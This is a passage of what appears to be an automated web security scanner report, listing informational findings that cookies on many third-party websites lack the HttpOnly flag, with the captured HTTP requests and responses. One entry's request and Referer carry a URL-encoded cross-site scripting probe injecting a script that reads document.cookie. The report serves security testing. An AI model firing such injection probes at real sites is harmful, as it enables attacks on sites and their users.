Set-Cookie: WEBTRENDS_ID=173.193.214.243-1295921924.19297; expires=Fri, 22-Jan-2021 02:18:44 GMT; path=/dcs1djgf3c87ozzcdiy9h9817_3i3h
P3P: CP="NON DSP COR NID TAIa OUR NOR STA,policyref="http://www.autocheck.com/w3c/p3p.xml"
Last-Modified: Thu, 18 Dec 2008 10:22:42 GMT
ETag: "1658028-2b-45e4f929c8080"
Accept-Ranges: bytes
Content-Length: 43
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.599. http://webtrends.autocheck.com/dcs1djgf3c87ozzcdiy9h9817_3i3h/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webtrends.autocheck.com
Path:	/dcs1djgf3c87ozzcdiy9h9817_3i3h/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMjk1OTIxOTI0LjE5Mjk3AAAAAAAAAAABAAAAAgAAAAQzPk0EMz5NAQAAAAEAAAAEMz5NBDM+TQAAAAA-; path=/; expires=Fri, 22-Jan-2021 02:18:44 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs1djgf3c87ozzcdiy9h9817_3i3h/dcs.gif?dcsredirect=1&dcsdat=1295921925437&dcssip=www.autocheck.com&dcsuri=/&dcsqry=%3FWT.mc_id=1824%26siteID=182471a71%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6dab831a574&dcsref=http://burp/show/54&WT.co_f=173.193.214.243-1295921924.19297&WT.vtid=173.193.214.243-1295921924.19297&WT.vtvs=1295921925442&WT.vt_f_tlv=0&WT.tz=-6&WT.bh=20&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=AutoCheck%20Vehicle%20History%20Reports%20Homepage%20-%20A%20Part%20of%20Experian.&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1155x1012&WT.fv=10.1&WT.slv=Unknown&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=www.autocheck.com/&WT.si_n=FreeVINCK&WT.si_x=1&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 HTTP/1.1
Host: webtrends.autocheck.com
Proxy-Connection: keep-alive
Referer: http://www.autocheck.com/?WT.mc_id=1824&siteID=182471a71%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6dab831a574
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WEBTRENDS_ID=173.193.214.243-1295921924.19297; WT_FPC=id=173.193.214.243-1295921924.19297:lv=1295943525442:ss=1295943525442

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:18:44 GMT
Server: Apache/2.2.3 (Red Hat)
Location: /usr/local/webtrends/sdc/util/content/wt_dcs.gif
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMjk1OTIxOTI0LjE5Mjk3AAAAAAAAAAABAAAAAgAAAAQzPk0EMz5NAQAAAAEAAAAEMz5NBDM+TQAAAAA-; path=/; expires=Fri, 22-Jan-2021 02:18:44 GMT
Expires: Tue, 1 Jan 1980 01:01:01 GMT
P3P: CP="NON DSP COR NID TAIa OUR NOR STA,policyref="http://www.autocheck.com/w3c/p3p.xml"
Last-Modified: Thu, 18 Dec 2008 10:22:42 GMT
ETag: "1658028-2b-45e4f929c8080"
Accept-Ranges: bytes
Content-Length: 43
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.600. http://widget.mibbit.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://widget.mibbit.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

backend=wbe01.mibbit.com; path=/; domain=widget.mibbit.com; expires=Tue, 25-Jan-2011 18:02:59 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: widget.mibbit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:02:59 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: backend=wbe01.mibbit.com; path=/; domain=widget.mibbit.com; expires=Tue, 25-Jan-2011 18:02:59 GMT
Location: http://wbe01.mibbit.com/
Vary: Accept-Encoding
Content-Length: 291
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://wbe01.mibbit.com/">here</a>.</p>
<hr>
<a
...[SNIP]...

14.601. http://world-cup-news.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://world-cup-news.net
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tm_identity=c4ce7beb6b80cbdc2e05ed76224f380c; expires=Tue, 01-Feb-2011 14:03:19 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: world-cup-news.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.602. http://world-cup-news.net/story/1401575902/world-cup-instant-twitter-replay-how-we-did-it-help-guardiancouk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://world-cup-news.net
Path:	/story/1401575902/world-cup-instant-twitter-replay-how-we-did-it-help-guardiancouk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tm_identity=c3cf7dbd05dce1901bd59f98734e4e26; expires=Tue, 01-Feb-2011 14:03:30 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /story/1401575902/world-cup-instant-twitter-replay-how-we-did-it-help-guardiancouk HTTP/1.1
Host: world-cup-news.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:03:30 GMT
Content-Type: text/html
Connection: close
Location: http://tweetmeme.com/story/1401575902/world-cup-instant-twitter-replay-how-we-did-it-help-guardiancouk
Set-Cookie: tm_identity=c3cf7dbd05dce1901bd59f98734e4e26; expires=Tue, 01-Feb-2011 14:03:30 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.00025510787963867
X-Served-In: 0.95033502578735
X-Served-By: h03
Content-Length: 0

14.603. http://world-cup-news.net/story/1402316381/2010-world-cup-south-african-man-killed-by-wife-kids-for-changing-tv-to-germany-australia-game-espn-soccernet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://world-cup-news.net
Path:	/story/1402316381/2010-world-cup-south-african-man-killed-by-wife-kids-for-changing-tv-to-germany-australia-game-espn-soccernet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tm_identity=2837f266a1df23b4f77d1a4b9e1852a6; expires=Tue, 01-Feb-2011 14:03:40 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /story/1402316381/2010-world-cup-south-african-man-killed-by-wife-kids-for-changing-tv-to-germany-australia-game-espn-soccernet HTTP/1.1
Host: world-cup-news.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:03:40 GMT
Content-Type: text/html
Connection: close
Location: http://tweetmeme.com/story/1402316381/2010-world-cup-south-african-man-killed-by-wife-kids-for-changing-tv-to-germany-australia-game-espn-soccernet
Set-Cookie: tm_identity=2837f266a1df23b4f77d1a4b9e1852a6; expires=Tue, 01-Feb-2011 14:03:40 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0001380443572998
X-Served-In: 1.6935610771179
X-Served-By: ded2061
Content-Length: 0

14.604. http://world-cup-news.net/story/1411828812/top-10-world-cup-twitter-trends-chart previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://world-cup-news.net
Path:	/story/1411828812/top-10-world-cup-twitter-trends-chart

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tm_identity=d4a5fe7a848bdce39798e03f7bda6654; expires=Tue, 01-Feb-2011 14:03:40 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /story/1411828812/top-10-world-cup-twitter-trends-chart HTTP/1.1
Host: world-cup-news.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:03:40 GMT
Content-Type: text/html
Connection: close
Location: http://tweetmeme.com/story/1411828812/top-10-world-cup-twitter-trends-chart
Set-Cookie: tm_identity=d4a5fe7a848bdce39798e03f7bda6654; expires=Tue, 01-Feb-2011 14:03:40 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.00014495849609375
X-Served-In: 1.6823539733887
X-Served-By: h03
Content-Length: 0

14.605. http://world-cup-news.net/story/1412306061/source-fifa-may-sit-slovenia-us-referee-international-football-yahoo-sports previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://world-cup-news.net
Path:	/story/1412306061/source-fifa-may-sit-slovenia-us-referee-international-football-yahoo-sports

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tm_identity=b277a2b83d1e0bfb440624ef26d1c4c6; expires=Tue, 01-Feb-2011 14:03:36 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /story/1412306061/source-fifa-may-sit-slovenia-us-referee-international-football-yahoo-sports HTTP/1.1
Host: world-cup-news.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:03:36 GMT
Content-Type: text/html
Connection: close
Location: http://tweetmeme.com/story/1412306061/source-fifa-may-sit-slovenia-us-referee-international-football-yahoo-sports
Set-Cookie: tm_identity=b277a2b83d1e0bfb440624ef26d1c4c6; expires=Tue, 01-Feb-2011 14:03:36 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.00011301040649414
X-Served-In: 1.7047410011292
X-Served-By: ded2060
Content-Length: 0

14.606. http://world-cup-news.net/story/1416869398/bbc-sport-football-world-cuo-2010-nicolas-anelka-misses-france-training previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://world-cup-news.net
Path:	/story/1416869398/bbc-sport-football-world-cuo-2010-nicolas-anelka-misses-france-training

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tm_identity=f2ac14a1a2966370f1aba65e8a7e5204; expires=Tue, 01-Feb-2011 14:03:29 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /story/1416869398/bbc-sport-football-world-cuo-2010-nicolas-anelka-misses-france-training HTTP/1.1
Host: world-cup-news.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:03:29 GMT
Content-Type: text/html
Connection: close
Location: http://tweetmeme.com/story/1416869398/bbc-sport-football-world-cuo-2010-nicolas-anelka-misses-france-training
Set-Cookie: tm_identity=f2ac14a1a2966370f1aba65e8a7e5204; expires=Tue, 01-Feb-2011 14:03:29 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0001218318939209
X-Served-In: 1.3096618652344
X-Served-By: h02
Content-Length: 0

14.607. http://world-cup-news.net/story/1424331193/bbc-sport-football-capello-to-quit-if-england-fail-to-reach-last-16 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://world-cup-news.net
Path:	/story/1424331193/bbc-sport-football-capello-to-quit-if-england-fail-to-reach-last-16

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tm_identity=ab42539c881d21d1f6e470ff9bbbd01a; expires=Tue, 01-Feb-2011 14:03:35 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /story/1424331193/bbc-sport-football-capello-to-quit-if-england-fail-to-reach-last-16 HTTP/1.1
Host: world-cup-news.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:03:35 GMT
Content-Type: text/html
Connection: close
Location: http://tweetmeme.com/story/1424331193/bbc-sport-football-capello-to-quit-if-england-fail-to-reach-last-16
Set-Cookie: tm_identity=ab42539c881d21d1f6e470ff9bbbd01a; expires=Tue, 01-Feb-2011 14:03:35 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.00010514259338379
X-Served-In: 1.5907509326935
X-Served-By: h00
Content-Length: 0

14.608. http://world-cup-news.net/story/1427486259/the-best-website-designs-of-the-2010-world-cup-webdesigner-depot previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://world-cup-news.net
Path:	/story/1427486259/the-best-website-designs-of-the-2010-world-cup-webdesigner-depot

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tm_identity=f1e92053a836534b6f3cbe7d94dbf69a; expires=Tue, 01-Feb-2011 14:03:38 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /story/1427486259/the-best-website-designs-of-the-2010-world-cup-webdesigner-depot HTTP/1.1
Host: world-cup-news.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:03:38 GMT
Content-Type: text/html
Connection: close
Location: http://tweetmeme.com/story/1427486259/the-best-website-designs-of-the-2010-world-cup-webdesigner-depot
Set-Cookie: tm_identity=f1e92053a836534b6f3cbe7d94dbf69a; expires=Tue, 01-Feb-2011 14:03:38 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.00016593933105469
X-Served-In: 1.3061110973358
X-Served-By: h01
Content-Length: 0

14.609. http://world-cup-news.net/story/1445743829/usa-vs-algeria-world-cup-match-could-set-new-internet-traffic-record previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://world-cup-news.net
Path:	/story/1445743829/usa-vs-algeria-world-cup-match-could-set-new-internet-traffic-record

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tm_identity=a1d1e4b8c0ebb5bd0bdc338521f10b62; expires=Tue, 01-Feb-2011 14:03:26 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /story/1445743829/usa-vs-algeria-world-cup-match-could-set-new-internet-traffic-record HTTP/1.1
Host: world-cup-news.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:03:26 GMT
Content-Type: text/html
Connection: close
Location: http://tweetmeme.com/story/1445743829/usa-vs-algeria-world-cup-match-could-set-new-internet-traffic-record
Set-Cookie: tm_identity=a1d1e4b8c0ebb5bd0bdc338521f10b62; expires=Tue, 01-Feb-2011 14:03:26 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0001680850982666
X-Served-In: 0.55980706214905
X-Served-By: h01
Content-Length: 0

14.610. http://world-cup-news.net/story/1446425875/algeria-star-slaps-female-reporter-international-football-yahoo-sports previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://world-cup-news.net
Path:	/story/1446425875/algeria-star-slaps-female-reporter-international-football-yahoo-sports

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tm_identity=37e764f9e766e864acef056d8324ed36; expires=Tue, 01-Feb-2011 14:03:42 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /story/1446425875/algeria-star-slaps-female-reporter-international-football-yahoo-sports HTTP/1.1
Host: world-cup-news.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:03:42 GMT
Content-Type: text/html
Connection: close
Location: http://tweetmeme.com/story/1446425875/algeria-star-slaps-female-reporter-international-football-yahoo-sports
Set-Cookie: tm_identity=37e764f9e766e864acef056d8324ed36; expires=Tue, 01-Feb-2011 14:03:42 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 9.2029571533203E-5
X-Served-In: 1.1478500366211
X-Served-By: h02
Content-Length: 0

14.611. http://world-cup-news.net/story/1446502910/fifacom-australia-serbia-the-matches-of-2010-fifa-world-cup-south-africa previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://world-cup-news.net
Path:	/story/1446502910/fifacom-australia-serbia-the-matches-of-2010-fifa-world-cup-south-africa

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tm_identity=4af6ad630988cb3d4007a3e22f0d2c55; expires=Tue, 01-Feb-2011 14:03:25 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /story/1446502910/fifacom-australia-serbia-the-matches-of-2010-fifa-world-cup-south-africa HTTP/1.1
Host: world-cup-news.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 14:03:25 GMT
Content-Type: text/html
Connection: close
Location: http://tweetmeme.com/story/1446502910/fifacom-australia-serbia-the-matches-of-2010-fifa-world-cup-south-africa
Set-Cookie: tm_identity=4af6ad630988cb3d4007a3e22f0d2c55; expires=Tue, 01-Feb-2011 14:03:25 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.00011491775512695
X-Served-In: 1.0151119232178
X-Served-By: h01
Content-Length: 0

14.612. http://www.addthis.com/bookmark.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Coyote-2-a0f0083=a0f021f:0; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 92372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...

14.613. http://www.addthis.com/feed.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/feed.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

pub=deleted; expires=Sun, 24-Jan-2010 16:03:18 GMT; path=/
Coyote-2-a0f0083=a0f021f:0; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /feed.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: pub=deleted; expires=Sun, 24-Jan-2010 16:03:18 GMT; path=/
Vary: Accept-Encoding
Content-Length: 7588
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

14.614. http://www.aerotrader.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aerotrader.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Tue, 24-Jan-2012 23:22:56 GMT
TSef43b4=dda16b828fd3667079886639fd1d974f3651df908a5a2b674d3e0c18759e864aee104e3b; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.aerotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.615. http://www.alistapart.com/articles/alternate/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.alistapart.com
Path:	/articles/alternate/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

exp_last_visit=980553804; expires=Tue, 24-Jan-2012 16:03:24 GMT; path=/
exp_last_activity=1295913804; expires=Tue, 24-Jan-2012 16:03:24 GMT; path=/
exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A20%3A%22%2Farticles%2Falternate%2F%22%3B%7D; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /articles/alternate/ HTTP/1.1
Host: www.alistapart.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: mobify=0; expires=Mon, 24-Jan-2011 18:03:24 GMT; path=/; domain=.alistapart.com
Set-Cookie: exp_last_visit=980553804; expires=Tue, 24-Jan-2012 16:03:24 GMT; path=/
Set-Cookie: exp_last_activity=1295913804; expires=Tue, 24-Jan-2012 16:03:24 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A20%3A%22%2Farticles%2Falternate%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 16:03:24 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>A List Ap
...[SNIP]...

14.616. http://www.apture.com/js/apture.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.apture.com
Path:	/js/apture.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

AC=nbrlsqWMpk; Domain=.apture.com; expires=Sun, 17-Jan-2037 19:14:07 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.617. http://www.atvtraderonline.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.atvtraderonline.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Tue, 24-Jan-2012 23:23:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.atvtraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.618. http://www.autobytel.com/auto-insurance-quotes.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/auto-insurance-quotes.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:47:01 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.619. http://www.autobytel.com/car-advice.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-advice.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:47:46 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.620. http://www.autobytel.com/car-blog.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-blog.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:48:00 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.621. http://www.autobytel.com/car-dealers.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-dealers.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:51:25 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.622. http://www.autobytel.com/car-financing.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-financing.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:46:55 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.623. http://www.autobytel.com/car-incentives.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-incentives.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:45:07 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.624. http://www.autobytel.com/car-news.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-news.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:47:58 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.625. http://www.autobytel.com/car-pictures.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-pictures.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:44:32 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.626. http://www.autobytel.com/car-reviews.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-reviews.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:46:10 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.627. http://www.autobytel.com/content/buy/finance/index.cfm/action/Calculator previous next

Summary

Severity:	Information
Confidence:	Certain
